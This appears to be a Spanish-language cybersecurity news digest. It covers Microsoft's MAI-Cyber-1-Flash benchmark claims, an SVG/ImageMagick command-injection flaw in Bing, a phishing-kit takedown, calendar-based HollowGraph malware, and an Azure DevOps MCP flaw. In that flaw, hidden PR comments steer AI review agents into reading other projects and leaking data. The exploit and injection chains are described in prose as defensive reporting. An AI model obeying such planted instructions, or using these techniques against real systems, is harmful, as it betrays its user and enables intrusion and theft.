Microsoft dice que el nuevo modelo de IA de ciberseguridad ayuda a MDASH a alcanzar el 95,95% a la mitad del costo – CYBERDEFENSA.MX

Microsoft ha lanzado su primer modelo específico de ciberseguridad en su interior MDASHsu arnés de identificación y remediación de vulnerabilidades multimodelo.

La compañía dice que MDASH, utilizando MAI-Cyber-1-Flash y GPT-5.4, obtuvo una puntuación del 95,95% en CyberGym. También afirma que la configuración cuesta un 50% menos que su mejor combinación MDASH actual de GPT-5.4, GPT-5.4 mini y GPT-5.3 Codex. El acceso está limitado a clientes MDASH aprobados a través de una versión preliminar privada de Azure AI Foundry.

MAI-Cyber-1-Flash está diseñado para manejar hasta el 90% de las tareas MDASH, con GPT-5.4 reservado para el 10% más difícil. Está disponible solo dentro de MDASH, no como un modelo público independiente o una interfaz de programación de aplicaciones de propósito general.

La puntuación principal pertenece a MDASH que ejecuta MAI-Cyber-1-Flash junto con GPT-5.4, no al nuevo modelo en sí. CyberGym Nivel 1 es una prueba de reproducción de vulnerabilidad conocida. Le da al agente una descripción de la vulnerabilidad y el código fuente correspondiente sin parches, luego verifica si puede producir una prueba de concepto funcional. No mide el descubrimiento ciego de vulnerabilidades ni si un parche generado es correcto.

CyberGym’s tabla de clasificación pública no incluyó el resultado del 95,95% de Microsoft cuando se verificó el 28 de julio de 2026. Aún incluyó la presentación MDASH de Microsoft del 12 de mayo con un 88,4%. Los materiales públicos de Microsoft no dicen si el resultado se envió para su inclusión en la lista.

Ciberseguridad

El resultado anterior de Microsoft de 96,55% MDASH no resuelve la comparación. Esa cifra de junio contó cualquier falla, incluidas las vulnerabilidades no objetivo. Los materiales de julio no dicen si el resultado del 95,95% utiliza el mismo criterio, por lo que los dos puntajes no pueden leerse con seguridad como una tendencia de desempeño de antes y después.

Según Microsoft tarjeta modeloMAI-Cyber-1-Flash es un transformador de escasa mezcla de expertos con 137 mil millones de parámetros totales, cinco mil millones de parámetros activos y una ventana de contexto de 256 000 tokens. Es un ajuste fino de ciberseguridad de MAI-Código-1-Flashque se desarrolló a partir de un punto de control de mitad de entrenamiento de MAI-Thinking-1.

La tarjeta modelo dice que la configuración evaluada reemplazó el 80% de los modelos existentes de MDASH y elevó el resultado informado de CyberGym del 88,4% al 95,95%. Esa cifra del 80% es la proporción de modelos reemplazados. La cifra separada del 90% es la proporción máxima de tareas que Microsoft dice que puede realizar el modelo más pequeño.

En conjunto, el diseño revelado apunta al enrutamiento como la afirmación técnica central: MAI-Cyber-1-Flash está diseñado para manejar la mayoría de las tareas, GPT-5.4 se encarga del resto más difícil y Microsoft informa el resultado a nivel del sistema MDASH.

Microsoft anuncio de lanzamiento define el ahorro del 50% en comparación con su mejor combinación actual de modelos MDASH de GPT-5.4, GPT-5.4 mini y GPT-5.3 Codex. La página del producto describe por separado que el sistema ofrece «rendimiento comparable al 50% del costo de los modelos líderes». El anuncio y la tarjeta modelo no revelan el uso del token, el volumen de llamadas, la latencia, la combinación de tareas o la asignación de cómputo detrás de esa comparación, por lo que la cifra aún no se puede reproducir ni normalizar de forma independiente con respecto a otros sistemas.

«El modelo es un insumo, el sistema que lo rodea es el producto».

Ciberseguridad

Taesoo Kim, vicepresidente de seguridad agente de Microsoft, utilizó esa distinción cuando describiendo MDASH en junio. Bajo un arnés de terminal liviano, la tarjeta modelo reporta puntuaciones de 0,314 en CVEBench, 0,553 en inteligencia de amenazas CyberSecEval4, 0,33 en su prueba de análisis de malware y 0,651 en CRSBench con POV=1200.

El modelo obtuvo una puntuación de cero en las categorías de kernel, espacio de usuario y navegador de ExplotarGymque solicita a los agentes que conviertan las vulnerabilidades proporcionadas y las entradas de fallas en exploits de ejecución de código que funcionen. Esos resultados provienen de diferentes tareas y escalas de puntuación, por lo que ninguna es una puntuación CyberGym independiente para MAI-Cyber-1-Flash.

Microsoft dijo que todas las pruebas de referencia se llevaron a cabo en un entorno de red aislado sin acceso a los sistemas de producción, a la Internet pública ni a servicios externos. La tarjeta modelo también advierte que el texto y el código generados pueden ser inexactos o estar incompletos y deben revisarse antes de cualquier uso posterior.

La gestión de vulnerabilidades de software utilizando MAI-Cyber-1-Flash dentro de MDASH es el primer escenario que Microsoft ha anunciado para Project Perception, su sistema más amplio para coordinar agentes de seguridad defensiva. Percepción del proyecto está programado para entrar en versión preliminar pública el 3 de agosto, y Microsoft planea extender el modelo más allá del trabajo de vulnerabilidad de software a flujos de trabajo de seguridad adicionales.

Microsoft presenta ofertas de ciberseguridad de IA a medida que aumenta la competencia

Microsoft se lanzó al ruedo el lunes en la competencia cada vez más intensa entre las ofertas de ciberseguridad impulsadas por IA, presentando herramientas que, según afirma, son mejores y más baratas que sus rivales.

El nuevo modelo agente MAI-Cyber-1-Flashse ejecuta dentro de otra herramienta de seguridad de Microsoft, MDASH, y es parte de una plataforma de seguridad impulsada por IA que la compañía denominó Percepción del proyecto.

Microsoft sostiene que sus capacidades internas existentes dan una ventaja a Project Perception.

«Project Perception reúne señales, contexto, modelos y agentes especializados en un sistema de defensa en continuo aprendizaje», dijo la compañía en una publicación de blog. «Puede razonar, priorizar y actuar a la velocidad de la máquina mientras mantiene a los humanos firmemente en control y les brinda nuevos y poderosos flujos de trabajo».

Su lanzamiento sigue al llamativo debut de la suite de ciberseguridad de IA de OpenAI y Anthropic. Las empresas se han apresurado a publicitar sus ofertas de IA por su capacidad para encontrar vulnerabilidades, incluso cuando las advertencias más espantosas sobre el uso de la IA en el lado ofensivo han aún por llegar a buen término.

Como prueba de su superioridad, Microsoft dijo que MDASH con MAI-Cyber-1-Flash venció a Mythos, Gemini y GPT en CyberGym, «el punto de referencia estándar de oro para evaluar cómo los sistemas razonan sobre grandes bases de código para encontrar vulnerabilidades reales en el código». Obtuvo una puntuación del 96%, 12 puntos porcentuales por delante del siguiente mejor.

Microsoft dijo que MAI-Cyber-1-Flash se creó centrándose primero en la seguridad y fue evaluado de forma independiente por un tercero al que no nombró. Los sistemas de ciberseguridad de IA fueron una gran noticia la semana pasada después de que OpenAI dijera que sus modelos se liberaron de su confinamiento de prueba para piratear Hugging Face, una importante plataforma de código de IA.

El precio también fue una parte importante del lanzamiento de Microsoft: dijo que MAI-Cyber-1-Flash en MDASH puede hacer el trabajo a la mitad del costo de otros modelos líderes.

«Este es el beneficio de construir el arnés, el contexto/señales y el espacio de acción separados de una familia de modelos», dijo el presidente y director ejecutivo de Microsoft, Satya Nadella, en las redes sociales después de que la compañía presentara el Proyecto Percepción en San Francisco el lunes. «Al combinar modelos y datos especializados con los agentes, las herramientas, el contexto de seguridad y el aprovechamiento adecuados, podemos avanzar en la frontera del costo hacia el resultado».

Project Perception entrará en versión preliminar pública el 3 de agosto, dijo Microsoft.

Tim Starks

Escrito por Tim Starks

Tim Starks es reportero senior de CyberScoop. Sus paradas anteriores incluyen trabajar en The Washington Post, POLITICO y Congressional Quarterly. Originario de Evansville, Indiana, se ocupa de la ciberseguridad desde 2003. Envíe un correo electrónico a Tim aquí: tim.starks@cyberscoop.com.

Los defectos de las imágenes de Bing permiten que los SVG diseñados ejecuten comandos como SISTEMA en los servidores de Microsoft

Un SVG diseñado enviado a la búsqueda de imágenes de Bing ejecutó comandos como NT AUTHORITY\SYSTEM en los trabajadores de procesamiento de imágenes de producción de Microsoft y como root en las máquinas Linux de la misma flota.

Las pruebas de XBOW obtuvieron el mismo resultado en trabajadores de diferentes hosts y rangos de red, por lo que el problema se encontraba en el nivel de imagen de Bing, no en una máquina defectuosa. Microsoft emitió dos CVE críticos, CVE-2026-32194 y CVE-2026-32191, y calificó ambos con 9,8 en la escala CVSS.

XBOW, la startup autónoma de seguridad ofensiva, encontró ambos y los informó en privado. Los usuarios de Bing no tienen ningún parche o mitigación que aplicar: Microsoft arregló ambos lados del servidor antes de que salieran los avisos en marzo, y los registros indican que «no hay ninguna acción del cliente que resolver».

Ninguno de los avisos registró explotación o divulgación pública cuando se publicaron el 19 de marzo. XBOW publicó la mecánica del exploit el 23 de julio, después de retenerla a pedido de Microsoft hasta que la solución llegara.

Lo que sobrevive a la solución es la forma del error. La aplicación creía que estaba manejando una imagen; el ayudante debajo lee parte de esa imagen como un comando.

Ciberseguridad

Si su propia pila canaliza cargas o URL obtenidas por el servidor a través de ImageMagick o cualquier dispositivo compatible con ImageMagick, su exposición depende de si el contenido controlado por el atacante aún puede llegar a una ruta habilitada para delegados. Negue los delegados, corte los formatos que acepta y mantenga al trabajador fuera de la red, y el mismo SVG no hace nada.

La búsqueda inversa de imágenes de Bing obtiene la URL de una imagen desde el backend, porque eso es lo que hace la función. Por sí sola, esa es una SSRF ciega: nada regresa al cliente. El mensaje fue el error. Algunos trabajadores devolvieron un 500 al navegador y aun así buscaron y analizaron lo que recuperaron, lo que apuntaba a algo posterior que estaba realizando el análisis.

SVG respondió esa pregunta. Es XML, no píxeles: puede hacer referencia a otras imágenes, y un renderizador que sigue esas referencias va y las obtiene. Debajo, las suites de conversión de formatos manuales no se procesan por sí mismas ante un delegado, un programa externo invocado a través de un shell.

en el camino XBOW alcanzadoesa capa todavía estaba habilitada, por lo que una referencia de imagen que comenzaba con un carácter de barra vertical iba al shell en lugar de leerse como un nombre de archivo. La carga útil era un SVG de un píxel cuya referencia ejecutaba un comando en el trabajador y enroscaba la salida a un recopilador controlado por XBOW.

Eso dio dos rutas al mismo nivel de conversión y dos CVE.

  • CVE-2026-32194archivado como inyección de comando bajo CWE-77, es la carga pública de «Búsqueda por imagen», con el SVG en base64 como imageBin campo a /images/kblob.
  • CVE-2026-32191archivado como inyección de comando del sistema operativo según CWE-78, es la ruta del rastreador: alojar el SVG en cualquier lugar, entregar su URL a la búsqueda a través del imgurl parámetro, y bingbot/2.0 lo trae a la misma tubería. Tampoco necesita autenticación, cookies, estado de sesión o un clic.

The Hacker News verificó ambos registros CVE el 24 de julio. Ambos todavía tienen el estado de no divulgación pública de Microsoft en marzo, que el artículo de XBOW ha superado, y Microsoft todavía los enumera como no explotados.

La prueba tuvo que salir de banda. La interfaz podría devolver un error mientras el trabajador se ejecuta de todos modos. Los trabajadores de Linux devolvieron uid=0 y gid=0. En Windows, systeminfo llamado Centro de datos de Windows Server 2022, whoami /all mostró SeImpersonatePrivilege y SeDebugPrivilege habilitados, y los listados de directorios ejecutaron dentro de los componentes de procesamiento de imágenes multimedia de Bing. La empresa dice que solo ejecutó comandos benignos de solo lectura y no tocó datos de los clientes.

Ciberseguridad

Limitarlo a ese camino requirió docenas de investigaciones. Los pseudoprotocolos de ImageMagick regresaron de manera diferente según el codificador: label: texto renderizado y xc: produjo una imagen en color, mientras text:, caption: y las lecturas directas de archivos fallaron. Metacaracteres de Shell en el interior label: renderizado como texto en lugar de ejecutarse, lo que descartó a ese codificador. La ruta que llegó a un delegado fue la referencia de la imagen dentro del propio SVG.

Apague a los delegados

Un trabajador de procesamiento de imágenes que maneja archivos que no son de confianza no debe acceder a un shell, ejecutarse como SISTEMA ni tener acceso a Internet. El oleoducto de Bing hizo las tres cosas.

La propia guía de ImageMagick Es explícito que la política predeterminada es abierta y está destinada a uso en entornos aislados o firewall, no en un sitio web público. Para cualquier cosa que toque imágenes que no sean de confianza, rechace a los delegados directamente en policy.xml:

Luego, en orden de lo que más te compra:

  1. Corta los formatos que aceptes. SVG, MVG y EPS se encuentran entre los que cuentan con referencias e intérpretes.
  2. Revisar delegates.xml y deshabilite todo lo habilitado que no necesite.
  3. Ejecute la conversión en un espacio aislado y con privilegios reducidos.
  4. Bloquear la red saliente del trabajador, que es la pata que convirtió un error ciego en uno probado.
  5. Incluya en una lista blanca los destinos a los que puede llegar una recuperación del lado del servidor y mantenga al trabajador alejado de las direcciones internas.

La guía de ImageMagick es realizar pruebas después de cualquier cambio de política, y magick identify -list policy imprime lo que realmente está cargado.

ImagenTrágicala inyección de comando delegado de 2016 rastreada como CVE-2016-3714, es la misma clase de falla y sigue resurgiendo porque nadie cuenta el convertidor como parte de la superficie de ataque. Nico Waisman, CISO de XBOW, quien escribió la divulgación, lo expresó de esta manera: «Las aplicaciones tratan a los ayudantes de imágenes como plomería. Los atacantes los tratan como analizadores».

La recuperación era accesible, no devolvía nada y parecía un callejón sin salida. Lo que lo convirtió en un shell de SISTEMA fue el analizador detrás de él, y nada en la respuesta lo habría dicho.

Microsoft y las empresas tecnológicas apoyan la difusión de la IA de código abierto

Microsoft, junto con más de dos docenas de empresas de tecnología, están presionando a los formuladores de políticas para que apoyen sistemas y códigos de inteligencia artificial de código abierto en toda la sociedad, argumentando que será un enfoque más seguro que intentar restringir el acceso o depender de un puñado de modelos cerrados y propietarios.

El carta abiertapublicado el viernes, establece paralelismos con el industria del software de la década de 1980cuando las grandes empresas temían que el código de software de fuente abierta afectara sus negocios. Si bien la industria perdió esa batalla, el resultado final fue un ecosistema vibrante que ahora sustenta gran parte de la Internet moderna, la TI gubernamental e incluso los productos de software comercial.

También creó una “base compartida de conocimiento” que ha alimentado innumerables proyectos e innovaciones de software futuros.

«Estados Unidos se enfrenta ahora a una elección similar con la inteligencia artificial», escribieron las empresas. «Nuestro liderazgo en IA no será juzgado por un modelo de IA de frontera, sino por si Estados Unidos construye un ecosistema fuerte y abierto que se difunda en todos los sectores».

Ampliar el acceso y el soporte a la IA de código abierto conlleva un riesgo de seguridad significativo. Los expertos en ciberseguridad advierten que uno de los mayores beneficiarios de las herramientas de inteligencia artificial ampliamente disponibles son los delincuentes de bajo nivel que hasta ahora carecían de la experiencia técnica o los recursos para lanzar ataques graves.

Una vez que un modelo está abierto, cualquiera puede descargarlo, personalizarlo, quitarle las barreras y usarlo para sus propios fines. A medida que los modelos de código abierto han mejorado en la creación de deepfakes y otras imágenes generadas por IA, el peligro de CSAM personalizado localmente y deepfakes sexualizados también podría crecer.

Pero la carta sostiene que los modelos de IA de peso abierto son más beneficiosos para las empresas emergentes, las universidades, los laboratorios de investigación y otras organizaciones pequeñas y ambiciosas que pueden innovar e iterar la tecnología y hacerla más útil para la sociedad.

«Los pesos abiertos permiten que cada organización combine el modelo correcto con el trabajo correcto al costo correcto, reservando capacidad a escala de frontera para problemas de frontera genuinos y ejecutando modelos especializados eficientes en todos los demás», escribieron las empresas. «Esa disciplina es lo que hará que la IA sea económicamente sostenible a medida que su uso se extienda a miles de millones de tareas cotidianas».

Específicamente para la ciberseguridad, la carta sostiene que los defensores armados con IA de código abierto superarán a los atacantes mejor que cualquier enfoque de modelo cerrado.

«En un mundo donde los atacantes de la ciberseguridad utilizan IA avanzada, los defensores necesitan acceso a modelos con capacidades comparables para poder detectar, simular y responder a amenazas emergentes», escribieron las empresas. «Los modelos abiertos amplían la capacidad defensiva, aumentan la transparencia y permiten descubrir y remediar vulnerabilidades en muchos equipos».

Otras empresas destacadas que firman la carta son Meta, Palantir, Perplexity, Mistral, NVIDIA, Mozilla, The Linux Foundation, Hugging Face, Dell Technologies e IBM.

Los formuladores de políticas estadounidenses continúan luchando por lograr un equilibrio entre el apoyo desenfrenado a la industria nacional de IA y la supervisión y regulación de los daños que resultan de su uso.

La administración Trump ha pasado por varios marcos desde que asumió el cargo, primero un enfoque de laissez-faire sin restricciones, luego una orden ejecutiva que crea un régimen de pruebas voluntarias para la industria, luego la imposición de controles de exportación en el modelo Fable de Anthropic y, según se informa, presionando a OpenAI para que retrase el lanzamiento de sus modelos por preocupaciones de ciberseguridad.

La carta llega cuando la administración Trump ha supuestamente considerado una orden ejecutiva que restringiría el acceso y la disponibilidad estadounidense a los modelos de código abierto fabricados en China.

Pero la Casa Blanca y las empresas estadounidenses están tratando de hacer algo al reconocer los beneficios generales de un enfoque de código abierto, al tiempo que se muestran cautelosos a la hora de hacer cualquier cosa que pueda beneficiar potencialmente a sus rivales chinos.

A principios de este mes, la Casa Blanca anunció la creación de su centro de intercambio de información sobre ciberseguridad de IA Gold Eagle, que ayudaría a coordinar el trabajo del gobierno, el sector privado y la sociedad civil para encontrar y cerrar las vulnerabilidades descubiertas por la IA. Una gran parte de ese esfuerzo, dijo un alto funcionario de la Casa Blanca, es apoyar a los proveedores y mantenedores de herramientas de inteligencia artificial de código abierto.

Derek B. Johnson

Escrito por Derek B. Johnson

Derek B. Johnson es reportero de CyberScoop, donde su área incluye la ciberseguridad, las elecciones y el gobierno federal. Antes de eso, ha brindado una cobertura galardonada de noticias sobre ciberseguridad en los sectores público y privado para varias publicaciones desde 2017. Derek tiene una licenciatura en periodismo impreso de la Universidad de Hofstra en Nueva York y una maestría en políticas públicas de la Universidad George Mason en Virginia.

La policía desmantela el kit de phishing Kratos creado para robar sesiones de Microsoft 365 y eludir MFA – CYBERDEFENSA.MX

Las fuerzas del orden alemanas y estadounidenses han derribado la infraestructura central de Kratosdescrito por investigadores alemanes como uno de los kits de phishing criminal más utilizados en el mundo, y las autoridades indonesias arrestaron al hombre que, según dicen, lo desarrolló y ejecutó.

en un porro anuncio El lunes, la unidad de delitos cibernéticos (ZIT) del fiscal público de Frankfurt y la Oficina Federal de Policía Criminal (BKA) de Alemania dijeron que habían desconectado más de 200 servidores. Los investigadores estiman que aproximadamente 1.800 clientes de pago utilizaron Kratos para ejecutar unas 15.000 campañas de phishing al mes.

Kratos recopiló más que contraseñas. El kit fue diseñado para robar la cookie de sesión junto con el inicio de sesión, y esa cookie es suficiente para pasar la autenticación de dos factores en la cuenta como usuario, dijo la BKA.

ANY.RUN, que ingeniería inversa del kitlos operadores encontrados podían elegir uno de dos modos: una página PHP simple que solo recopila credenciales, o un proxy inverso de Node.js diseñado para transmitir el inicio de sesión a Microsoft en tiempo real y capturar la sesión resultante. Esa segunda modalidad es la técnica del adversario en el medio que ha convertido al MFA ordinario en un respaldo mucho más débil de lo que parece.

Ciberseguridad

La operación se desarrolló como una franquicia, con los clientes que la BKA llamaba franquiciados. Pagaron en criptomonedas y se registraron a través de un sitio web exclusivo y una tienda de Telegram para administrar sus cuentas y organizar campañas, de modo que incluso los actores poco calificados pudieran apuntar un kit AiTM funcional a un objetivo.

Las autoridades cifran el número de víctimas desde finales de 2024 en cientos de miles, repartidas en más de 30 países y concentradas en Europa y Estados Unidos. Calculan que los operadores ganaron más de 300.000 euros desde 2024 y que cada campaña podría llegar a varios miles de destinatarios.

Kratos ya estaba siendo rastreado. Inteligencia de amenazas de Microsoft identifica el mismo kit que Registro furtivouna plataforma de phishing como servicio que, según dice, ha realizado robo de credenciales y 2FA contra Microsoft 365 desde al menos principios de 2025, y detectó una campaña en el acto.

El 10 de febrero, los operadores enviaron correos electrónicos con temas fiscales a alrededor de 100 organizaciones, principalmente en los EE. UU., en los sectores de fabricación, venta minorista y atención médica, cada uno con un documento W-2 con un código QR personalizado para el destinatario que condujo a un inicio de sesión falso en Microsoft 365.

Los inicios de sesión robados de Microsoft rara vez son el final del camino. La BKA dijo que las credenciales robadas podrían usarse para más phishing, venderse a otros delincuentes o convertirse en un punto de apoyo dentro de las empresas al difundirse a través de sus entornos Microsoft 365, el camino familiar desde una bandeja de entrada suplantada hasta el compromiso del correo electrónico empresarial.

Carsten Meywirth, jefe de la división de cibercrimen de la BKA, afirmó que la operación demuestra «que incluso las infraestructuras de phishing altamente profesionales pueden combatirse eficazmente». Benjamin Krause, del ZIT, lo planteó como prueba del enfoque «perturbador» de la oficina de desmantelar un servicio criminal directamente en lugar de sólo acusar a las personas detrás de él.

Ciberseguridad

Microsoft está notificando a los usuarios atrapados en las campañas. Para cualquier persona a la que Microsoft notifique, la solución depende de cómo se vio afectada. Cuando el kit solo recopiló credenciales, un restablecimiento de contraseña y una verificación de MFA lo cubren. Cuando su modo de proxy inverso levantó una sesión en vivo, esa sesión sobrevive al reinicio, por lo que debe ser revocada, y las cuentas de alto valor se trasladan a un inicio de sesión resistente al phishing.

Los defensores que buscan exposición pueden buscar la indicación del kit: ANY.RUN encontró que sus páginas de inicio de sesión casi siempre cargan los activos emparejados barr.svg y lg.svg, luego PUBLICAN las credenciales robadas en puntos finales como next.php o save.php. Califica ese emparejamiento con un 90% de recuperación con casi cero falsos positivos.

Por ahora, los servidores están fuera de línea y, según la BKA, las campañas impulsadas por Kratos no pueden continuar. Lo que la eliminación no afectó son los aproximadamente 1.800 clientes ni el código del kit que ya poseen. ANY.RUN encontró que Kratos se ejecuta en dominios desechables, sitios de WordPress comprometidos y alojamiento compartido con otros kits de adversarios intermedios, el tipo de configuración que reaparece con un nuevo nombre una vez que los servidores caen.

La falla de Microsoft Azure DevOps MCP permite que los comentarios de relaciones públicas ocultos se apropien de los agentes de revisión de IA

Un solo comentario invisible en una solicitud de extracción de Azure DevOps puede poner al propio agente de codificación de IA del revisor en su contra, llevándolo a proyectos a los que el atacante no tiene derecho a acceder y filtrando silenciosamente lo que encuentra.

La falla está en el oficial de Microsoft. Servidor Azure DevOps MCPy funciona porque una de sus herramientas devuelve descripciones de solicitudes de extracción sin una barrera de inyección rápida que la empresa ya había aplicado a otras.

Empresa de seguridad ofensiva Seguridad múltiple detalló el error del diputado confundido esta semana. Microsoft envía el servidor para que los agentes de IA puedan leer y operar Azure DevOps para un usuario, a través de solicitudes de extracción, canalizaciones, wikis y elementos de trabajo, todo con los permisos propios del usuario. Ese es el problema: el contenido que escribieron otras personas puede convertirse en instrucciones sobre las que actúa el agente.

Las descripciones de Azure DevOps PR aceptan Markdown, que permite comentarios HTML. En la interfaz de usuario web, un comentario HTML () se muestra como nada, por lo que un revisor que se desplaza por la descripción ve un cambio normal. La API REST lo devuelve palabra por palabra y el servidor entrega ese texto directamente al agente.

Esa división entre lo que ve el humano y lo que recibe el modelo es el mecanismo de entrega: el atacante nunca habla con el agente, sino que coloca instrucciones en un contenido que sabe que leerá más tarde.

Cuando el revisor le pide a su agente que revise el PR, el texto oculto puede reescribir el objetivo del agente. El agente lleva las credenciales del revisor, por lo que puede actuar en proyectos a los que el atacante no tiene derecho a acceder.

Ciberseguridad

Manifold dice que el acceso alcanza el código fuente, los secretos y los elementos de trabajo, no solo la página wiki, su prueba de concepto exfiltrada. La firma considera que la escalada es un caso normal, ya que los revisores suelen ser de mayor rango que quien abrió la solicitud de extracción. El atacante no gana nada directamente; toman prestado el acceso del revisor a través de texto que el revisor nunca ve.

La ruta de la solicitud de extracción pasó por alto la barandilla

Lo que eleva esto por encima de una advertencia genérica de inyección rápida es que Microsoft ya envió una defensa para ello. Al leer la fuente del servidor, Manifold descubrió que utiliza foco, una técnica de La propia guía de Microsoft sobre inyección rápida indirecta: envuelve el contenido que no es de confianza en delimitadores para que el modelo pueda diferenciar los datos de las instrucciones que debe seguir.

La empresa lo añadió en PR #1062donde las herramientas de página wiki y registro de compilación pasan su salida a través de un asistente compartido, createExternalContentResponse. La herramienta que devuelve una solicitud de extracción, repo_get_pull_request_by_id, nunca la llama, por lo que devuelve la descripción sin formato, que es exactamente la superficie en la que escribe un atacante.

The Hacker News confirmó lo mismo camino todavía está descubierto en la fuente actual al 21 de julio.

En la prueba de concepto de Manifold, ejecutada en una compilación local de v2.7.0, un colaborador de un proyecto abre un PR de apariencia normal cuyo comentario oculto lleva la carga útil. Una vez que el agente comienza su revisión, el seguimiento de la herramienta ejecuta una cadena: activa una canalización en un proyecto diferente, lee una página wiki confidencial que el atacante no puede abrir y publica esa página como un comentario en el PR, donde el atacante la lee.

Un único comentario oculto impulsó toda la secuencia, y cada llamada que contenía era una que el agente podía realizar. El problema, escribieron los investigadores, era «la secuencia y la intención, impulsadas por un texto que un humano nunca vio». El equipo lo reprodujo tanto con Copilot CLI como con Claude Code, por lo que no está vinculado a un solo agente.

Sin embargo, la cadena tiene requisitos previos: texto de relaciones públicas escrito por el atacante, un flujo de trabajo que lo envía a un agente, un revisor cuyo acceso excede el del atacante y un agente autorizado para ejecutar herramientas sin preguntar.

Manifold confirmó que probó esa última parte como una postura de aprobación automática sin mensajes por herramienta, el punto de control que de otro modo permitiría a un revisor detectar una ejecución extraña entre proyectos antes de que se active. Un token amplio más esa postura es donde se concentra el riesgo.

La demostración supone que una persona inicia la revisión, pero Manifold señala hacia dónde se dirigen los equipos: revisión automatizada, clasificación y resúmenes generados por activadores, sin que ningún ser humano indique cada ejecución o lea cada resultado. En esa configuración, la descripción colocada se activa por sí sola y la fuga dura más tiempo antes de que alguien se dé cuenta.

El patrón no es nuevo. En mayo de 2025, Invariant Labs mostró el mismo tipo de ataque contra Servidor MCP de GitHubutilizando un problema público para obligar a un agente a leer un repositorio privado y filtrarlo a través de una solicitud de extracción; Desde entonces, la misma técnica ha llegado a los flujos de trabajo automatizados del agente GitHub.

Ese caso fue uno de los ejemplos que señaló Simon Willison al nombrar al trifecta letal: un agente con acceso a datos privados, exposición a contenido no confiable y una forma de enviar datos. Cualquier agente con los tres puede volverse contra su propietario con un solo fragmento de texto, y los más útiles tienen los tres.

Un portavoz de Microsoft agradeció a Manifold por informar del comportamiento bajo divulgación coordinada y lo llamó «una clase conocida de riesgo de IA» que informa el trabajo continuo de la compañía sobre sus salvaguardas. Microsoft no dijo si cambiaría el código o asignaría un CVE.

Ciberseguridad

Señaló que el ataque requiere que un atacante ya tenga acceso de escritura a un proyecto y un segundo usuario para invocar una herramienta de IA sobre el contenido, y recomendó a los clientes limitar el acceso al proyecto y «revisar los cambios propuestos antes de pedirle a una herramienta de IA que actúe en consecuencia». El problema es que la carga útil aquí es invisible en la interfaz que revisa un humano.

Hasta el 21 de julio, no hay ninguna versión solucionada y The Hacker News no encontró ningún CVE asignado a la falla en las bases de datos públicas. La última versión, v2.8.0enviado el 24 de junio. Ningún informe público sitúa la técnica en uso fuera de las propias pruebas de Manifold.

Manifold probó sólo el servidor local basado en PAT, pero le dijo a The Hacker News que la causa raíz está «en el código del servidor, no en el transporte». Según esa lógica, el alojamiento servidor MCP remoto También estaría expuesto, pero Manifold no lo probó y Microsoft no lo abordó.

El foco eleva el listón pero no cierra la inyección rápida por sí solo, por lo que las defensas son las habituales. Otorgue al agente tokens de privilegios mínimos y afínelo al proyecto que se está revisando. Cargue solo los dominios MCP que la tarea necesita; el servidor local los reduce con un indicador -d.

Mantenga las ejecuciones de canalizaciones, las lecturas de wiki y la publicación de comentarios fuera de un conjunto de herramientas de revisión de código que no los utiliza. Para verificar si la cadena ya se ejecutó, busque en los rastreos de herramientas del agente ejecuciones de canalizaciones entre proyectos, lecturas de wiki o comentarios que publicó durante una revisión, y escanee las descripciones de relaciones públicas abiertas en busca de comentarios HTML ocultos. Un revisor humano que no puede ver la carga útil no es un control.

La barandilla sólo funciona cuando alguien recuerda agregarla. Envuelve el contenido que no es de confianza en una ruta de respuesta a la vez, por lo que la defensa es tan fuerte como la ruta menos cubierta, y una envoltura faltante en una sola función es casi invisible desde el exterior. En una superficie de herramientas que sigue creciendo, brechas como ésta se abren más rápido de lo que nadie piensa al auditarlas.

El malware HollowGraph oculta archivos C2 y robados en eventos de Microsoft 365 con fecha de 2050 – CYBERDEFENSA.MX

Un implante de espionaje recién descubierto ha estado utilizando un sistema secuestrado microsoft 365 calendario como canal de comando, plantar instrucciones para operadores y sacar de contrabando archivos robados como archivos adjuntos en eventos del calendario fechados en el año 2050.

Grupo-IBque nombró el malware Gráfico huecodice que el enfoque mueve las tareas y los datos robados a través del tráfico legítimo de la API de Microsoft Graph, por lo que la actividad parece una charla normal de Microsoft 365 y los controles de red vinculados a destinos propiedad del atacante no tienen nada que señalar.

El implante es una DLL .NET que admite solo dos comandos, get y sendy nunca llega a un servidor propiedad del atacante para obtener cargas útiles. En cambio, trata el calendario del buzón comprometido como un punto muerto bidireccional.

Para realizar tareas, consulta el calendario para ver un evento que el operador haya plantado, enterrado en 2050-05-13por lo que es poco probable que el propietario del buzón se desplace hasta él y lea las instrucciones de un archivo adjunto. Para exfiltrar, hace lo contrario: cifra el archivo robado, crea su propio evento en el futuro lejano y carga los datos como uno o más archivos adjuntos.

Todo lo que se mueve a través del calendario está envuelto en cifrado híbrido RSA y AES-256, con pares de claves separados para las tareas entrantes y los datos salientes.

Ciberseguridad

Un segundo canal, más tosco, mantiene vivo el acceso a Graph. A través de DNS, HollowGraph actualiza los detalles de inicio de sesión de Entra ID (Azure AD) de la aplicación: su ID de inquilino, ID de cliente, secreto de cliente y buzón de correo de destino. Decodifica esos valores de los registros AAAA IPv6 enviados por un dominio atacante, cloudlanecdn[.]comluego los escribe a logAzure.txtun archivo disfrazado de registro de rutina. Esas son credenciales de cliente almacenadas, no tokens de acceso y, a diferencia del tráfico del calendario, este canal se ejecuta de forma clara.

Group-IB vincula a HollowGraph con Caverna con gran confianza, en la sintaxis de comandos compartida y en la correspondencia de tareas internas. Cavern es un marco de puerta trasera modular que Check Point documentado a principios de este mes y atribuido a un actor vinculado al Ministerio de Inteligencia y Seguridad iraní al que llama Mantícora de cavernaun grupo que, según dice, se superpone con los conocidos grupos iraníes MuddyWater y Lyceum.

Pero el vínculo firme es con el código, no con la tripulación. Group-IB no nombrará al operador detrás de esta campaña: «Basándonos en la evidencia disponible actualmente, no podemos atribuir con seguridad esta actividad a ningún actor de amenaza previamente identificado», escribió, señalando sólo una superposición de baja confianza con Lyceum, un subgrupo del actor iraní OilRig. El buzón de exfiltración comprometido pertenece a una organización israelí, pero Group-IB lo trata como geografía de la víctima, no como atribución.

Group-IB encontró el implante en al menos 12 máquinas, solo unas tres de ellas hablaban activamente con el atacante durante la ventana de análisis, con un tráfico de víctimas del 3 de junio al 9 de julio de 2026. Lee esa huella pequeña y selectiva como espionaje dirigido en lugar de crimen oportunista, aunque la técnica detrás de esto podría reutilizarse mucho más ampliamente que esta campaña.

Aquí no hay ninguna vulnerabilidad del software de Microsoft ni ningún parche que implementar. HollowGraph utiliza una cuenta comprometida y la funcionalidad normal de Graph API, que es exactamente la razón por la que es difícil de detectar. El trabajo se centra en la identidad y los permisos de las aplicaciones, además de la supervisión, no en un parche.

Que estar atento

